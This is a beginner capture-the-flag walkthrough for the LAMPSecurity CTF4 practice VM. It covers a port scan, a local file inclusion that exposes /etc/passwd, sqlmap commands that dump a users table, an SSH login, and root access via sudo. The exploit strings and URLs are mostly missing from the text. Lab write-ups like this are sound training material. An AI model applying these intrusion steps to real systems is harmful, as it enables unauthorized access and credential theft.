April 26, 2019

LAMP security CTF4 Walk through

Hello readers,
 Today we are going to see another CTF “LAMPSecurity CTF4” (//www.vulnhub.com/entry/lampsecurity-ctf4,83/). 
The difficulty level will be for beginners, and the main objective will be to get the root privilege of the target system.

The VM is password protected and intentionally the credentials were not provided. Let’s give our best to break and escalate the root privilege. 

List of actions
1)    Find the target
2)    Scan for port and services
3)    HTTP enumeration (LFI Exploitation)
4)    SQLMAP scanning
5)    Dump and crack the hashes
6)    SSH login
7)    Root privilege escalation

Find the target

Try to find out the target VM by executing the following command

Finally, we got our target

Scan for port and services

In this step, we will scan for active ports and the running services

Nmap –A

Port 22          ssh       OpenSSH 4.3          Open
Port 25          SMTP    Sendmail                 Open
Port 80          HTTP      Apache                    Open

HTTP enumeration (LFI Exploitation)

Let’s navigate to the web application on port 80

Now when I put the below string in the browser address bar, it exposes LFI flaw by displaying the /etc/passwd file of the server.

Also, I found SQL warning after tampering with “ ‘ ” at the end of the page URL.’

Scanning with SQLMAP

Let’s scan the database with SQLMAP by execution the below command 

Sqlmap –u “” –p id –tables

After the completion of the command, we will get several database details. But we will continue enumeration with ehks.

Dump and crack the hashes 
In this section, we will enumerate ehks database to get the user table details

Sqlmap –u “”  -p id –D ehks –T users –dump


We have successfully got the usernames and their credentials in the output.

SSH login

Let us take any user credentials to get the shell using SSH

Yay! We got our first restrictive shell in

Now let's check what is the restriction was applied on the current user account
Execute sudo -l in the command shell and see the output.

The above output is showing that there is no restriction over the user.

Root privilege escalation

Now I will try to get the root privilege by typing the below command
Sudo -i 

Wow! Finally, we have got the root privilege of the system.

Thanks for reading my article on this CTF challenge. Please give your valuable feedback on the same in the below comment section.


Post a Comment